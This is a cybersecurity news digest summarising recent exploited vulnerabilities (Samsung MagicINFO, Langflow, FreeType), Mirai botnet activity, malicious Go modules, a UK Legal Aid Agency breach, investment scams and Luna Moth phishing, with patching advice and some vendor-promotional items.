Daily Brief

Hackers are exploiting an RCE vulnerability (CVE-2024-7399) in Samsung MagicINFO 9 Server, allowing device hijacking and malware deployment. Samsung MagicINFO Server is a central management system used widely in sectors like retail and healthcare to manage multimedia content on digital signs. The vulnerability, disclosed and patched in August 2024, stems from improper file upload restrictions enabling attackers to upload malicious code. Security researchers recently published a proof-of-concept demonstrating how attackers achieve remote code execution by uploading a .jsp file and executing OS commands via the web. Arctic Wolf has reported active exploitation following the release of the proof-of-concept, predicting continued targeting due to the vulnerability's ease of exploitation. A variant of the Mirai botnet malware has been observed leveraging this vulnerability to take over affected devices. Urgent patching to version 21.1050 or later is recommended for system administrators to mitigate the risk associated with this vulnerability.

The UK Legal Aid Agency (LAA) has reported a cybersecurity incident potentially affecting financial records. Law firms partnered with LAA were alerted about the possibility of compromised payment information. Around 2,000 legal aid providers in England and Wales may be impacted by this security issue. The UK's National Crime Agency, alongside the National Cyber Security Centre, is assisting MoJ in investigating the cyber incident. This breach notification follows several high-profile cyberattacks on major UK retailers, indicating a larger trend of targeted cyber operations in the region. The LAA is currently assessing the extent of the incident and has implemented measures to mitigate further risks. The UK National Cyber Security Centre (NCSC) emphasized the urgency for all UK businesses to enhance their cybersecurity measures in response to recent events.

CISA has announced that the CVE-2025-3248 Langflow RCE vulnerability is actively exploited, prompting urgency in implementing security updates. The flaw allows unauthenticated internet-based attackers to gain control of affected Langflow servers via a flaw in an API endpoint. Langflow, an open-source tool used extensively for AI development, has a vulnerability in endpoint that improperly sanitizes user-input, enabling remote code execution. The vulnerability was resolved in Langflow version 1.3.0, with a recommendation for users to upgrade to mitigate risks. Horizon3 researchers have released a technical analysis of the CVE-2025-3248 flaw, noting at least 500 internet-exposed instances and demonstrating a proof-of-concept exploit. CISA mandates federal agencies to update or secure Langflow installations by May 26, 2025, or discontinue its use. Those unable to upgrade immediately should limit network exposure of Langflow by employing measures like firewalls or VPNs and avoid direct internet connections. The latest software version, Langflow 1.4.0, includes numerous fixes, further enhancing security postures for users.

Threat actors have exploited obsolete GeoVision IoT devices through command injection flaws to build a Mirai botnet. These compromised devices are used for distributed denial-of-service (DDoS) attacks, detected first by Akamai SIRT in April 2025. Samsung MagicINFO 9 Server vulnerability, patched in August 2024, also targeted for Mirai botnet deployment using a path traversal flaw. Akamai identifies that outdated firmware on older devices with no available patches is a major vulnerability for such attacks. Exploited vulnerabilities include high-severity flaws in Hadoop YARN and a previously identified issue in DigiEver. Arctic Wolf recommends updating Samsung MagicINFO to version 21.1050 or later to mitigate risks associated with these vulnerabilities. Evidence links these incidents to a known campaign "InfectedSlurs," emphasizing the reuse of tactics and tools among cybercriminal networks.

Modern organizations struggle to secure their public-facing assets due to factors like shadow IT and third-party exposures. External Attack Surface Management (EASM) is increasingly crucial in mitigating vulnerabilities and enhancing digital resilience. EASM enables security teams to manage and comprehend complex digital attack surfaces, particularly in hybrid environments. It offers continuous visibility, crucial for proactive threat detection and risk prioritization, thus preventing potential cyberattacks. Digital Risk Protection (DRP) complements EASM by proactively identifying threats across an organization’s digital footprint, including social media and the deep web. EASM’s integration into DRP strategy should involve regular assessments, collaboration across departments, continuous improvement, and careful vendor selection. Outpost24’s EASM solution is highlighted as an effective tool combining cyber threat intelligence and attack surface management.

Cybersecurity researchers identify two groups, Reckless Rabbit and Ruthless Rabbit, using Facebook ads to promote investment scams with fake celebrity endorsements. Scammers employ Traffic Distribution Systems to manage and filter user traffic, enhancing the effectiveness of their schemes. The scams involve sophisticated data collection via web forms, then use HTTP GET requests to validate potential victims' geography and contact details. Victims passing initial screenings are led to platforms where they are deceived into transferring funds or entering financial data. Reckless Rabbit targets users in specific Eastern European countries, using domain generation algorithms to dynamically create credible yet fake platform domains. Scams leverage call centers to guide victims through the money transfer process, intensifying the scam's perceived legitimacy. U.S. and European authorities are taking action against similar scams, indicating a growing trend of sophisticated cybercrimes using social media platforms. Recent arrests in Spain and escalating scam operations worldwide emphasize the persistent and adaptive nature of cybercriminal strategies.

Google has issued security updates for Android, addressing 45 vulnerabilities, including an actively exploited FreeType 2 flaw. The critical vulnerability, identified as CVE-2025-27363, allows arbitrary code execution and affects all versions of FreeType up to 2.13. Facebook security researchers first discovered this high-severity bug in March 2025, with potential targeted exploitation noted. Exploitation involves an out-of-bounds write when parsing certain TrueType font files in vulnerable FreeType versions. Additional updates in the May 2025 bulletin cover high-severity issues in Android's Framework, System, Google Play, and Kernel, along with components from MediaTek, Qualcomm, Arm, and Imagination Technologies. The security updates are applicable to Android versions 13, 14, and 15, with older versions like Android 12 no longer supported or receiving fixes directly, though Google Play system updates may offer some mitigation. Android users with unsupported versions are advised to switch to third-party distributions or newer devices to maintain security.

The 2025 Verizon Data Breach Investigations Report highlights significant breaches driven by third-party exposure and machine credential abuse. Incidents linked to third parties doubled in one year, emphasizing the need for robust management of non-employee identities. Machine identities, such as service accounts and bots, are rapidly increasing and becoming prime targets for attackers due to poor oversight. Traditional security tools are insufficient for the growing complexity and scale of managing both human and machine identities in a unified way. SailPoint offers solutions that address these complex challenges by providing an enterprise-scale identity security platform that includes machine identities management. Organizations are advised to adopt a unified approach to identity governance to protect against vulnerabilities and enhance security across all user types. The DBIR urges businesses to extend identity security practices to encompass contractors, partners, and machine entities to avoid potential breaches.

Microsoft has issued a warning regarding the potential security weaknesses in using default Helm charts for Kubernetes deployments. Helm charts, which simplify the deployment process of applications on Kubernetes, often come with default settings that prioritize convenience over security, leading to potential misconfigurations. These misconfigurations can expose sensitive data, cloud resources, or entire environments, making them vulnerable to attacks. Key vulnerabilities include exposing services to the internet without adequate network controls and lacking sufficient authentication or authorization safeguards. Microsoft's research team advises reviewing and adjusting the configurations in Helm charts and YAML manifests based on security best practices. Regular scans of publicly facing interfaces and ongoing monitoring of container activities are recommended to detect and mitigate threats. The issue is significant because many exploits of containerized applications originate from these default and negligent configurations.

Microsoft Entra ID is critical for identity management in business, heavily targeted with over 600 million daily attacks. Despite built-in protections such as multifactor authentication and conditional access, gaps remain in Microsoft Entra ID’s native security. Companies experience significant disruptions from breaches, including downtime, failed audits, and reputational damage. Microsoft's model indicates user responsibility for data backup, highlighting the importance of a dedicated backup strategy. Limitations in native recovery tools, like the Recycle Bin’s brief retention period, underscore the need for robust backup solutions. Effective backup strategies should align with organizational risk profiles, balancing protection needs against cost and resource availability. Tailored backup approaches enhance resilience, ensuring businesses can recover swiftly and continue operations despite threats. Veeam Data Cloud offers enhanced management and recovery solutions, catering to the inherent limitations of native Entra ID protections.

Researchers identified a supply-chain attack using malicious Go modules on GitHub designed to target Linux servers. The malware, contained within three Go modules, executes a disk-wiping script that leads to irreversible data loss and system failure. The destructive payload, a Bash script named done.sh, uses a 'dd' command to overwrite all data on the primary Linux storage volume, /dev/sda. This form of attack checks for a Linux environment before execution, ensuring it only affects Linux systems. The obfuscated code within the modules retrieves and immediately executes a remote wiper script, leaving minimal response time for mitigation. Impersonated Go modules mimicked legitimate projects, increasing the likelihood of developers inadvertently integrating malicious code into their applications. The decentralized nature of the Go ecosystem, with its lack of stringent verification, facilitates this type of malware dissemination. GitHub has since removed the identified malicious modules from its platform to prevent further spread.

Google released its May 2025 security update fixing 46 vulnerabilities, including a critically exploited security flaw. CVE-2025-27363, a high-severity vulnerability located in the System component, enables local code execution without extra privileges. The vulnerability is linked to an out-of-bounds write bug in the FreeType font rendering library and affects the processing of TrueType and variable fonts. Originally reported by Facebook in March 2025, CVE-2025-27363 was actively exploited in the wild prior to the update. Google upgraded FreeType to version higher than 2.13.0 to remediate the vulnerability. The security update also addressed additional issues in the Android System and Framework, enhancing protection against privilege escalation, data leaks, and service disruptions. Google has emphasized that the exploitation risks are mitigated by security improvements in newer Android versions and urged users to update their devices.

Critical security flaw in Langflow platform, CVE-2025-3248, now in the CISA's Known Exploited Vulnerabilities catalog due to active exploitation evidence. The flaw possesses a high severity score of 9.8 and enables remote, unauthenticated attackers to execute arbitrary code through the /api/v1/validate/code endpoint. Attack methodology involves misuse of Python’s exec() function without proper authentication or security measures in place, facilitating remote command execution on affected servers. While the vulnerability impacts multiple versions of Langflow, a fix has been provided in the latest version 1.3.0, released on March 31, 2025. Researchers at Horizon3.ai discovered and reported the vulnerability; it is deemed "easily exploitable" and potentially allows full server control. A proof-of-concept for the exploit was made public on April 9, 2025, increasing the urgency for patch implementations. Over 400 internet-exposed instances of Langflow have been identified, predominantly in the US, Germany, Singapore, India, and China. CISA mandates Federal Civilian Executive Branch agencies to patch the vulnerability by May 26, 2025, underlining the critical nature of the flaw.

President Trump's 2026 budget proposal recommends a $491 million cut for the Cybersecurity and Infrastructure Security Agency (CISA), a 17% reduction from its current funding. The proposed budget cuts are part of Trump's critique of CISA’s focus on countering online misinformation and election security, which he terms the "censorship industrial complex." In contrast to CISA's reduced funding, the Department of Homeland Security would receive a significant budget increase, specifically for enhancing border security and immigration enforcement. The criticism of CISA includes allegations of violating free speech by focusing on misinformation and self-promotion rather than protecting critical infrastructure. The budget proposal also contains financial reductions for other security agencies, including TSA and FEMA, citing reasons related to political bias and inefficiency. Trump has historically challenged the legitimacy of his election loss in 2020, influencing his stance on CISA's operations. Although a contentious proposal, it faces substantial challenges in Congress, with significant opposition expected, particularly regarding cuts to cybersecurity funding.

Luna Moth, also known as Silent Ransom Group, has increased data theft and extortion attacks on U.S. legal and financial sectors. These threat actors use callback phishing campaigns to gain remote access and steal sensitive data through social engineering tactics, without deploying ransomware. Attackers register fake domains through GoDaddy, mimicking IT support for major U.S. law and financial firms, to facilitate their scams. Victims are tricked into calling fake helpdesk numbers embedded in emails, where they are persuaded to install remote monitoring software, giving hackers direct access to their systems. Common tools exploited in these attacks include legitimate RMM software like Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop, which are less likely to be detected as threats. Once access is gained, hackers spread through the network, searching and extracting valuable data, which they threaten to publish unless a ransom is paid. EclecticIQ’s report suggests adding indicators of compromise to blocklists and advises restricting the use of unapproved RMM tools to mitigate risk.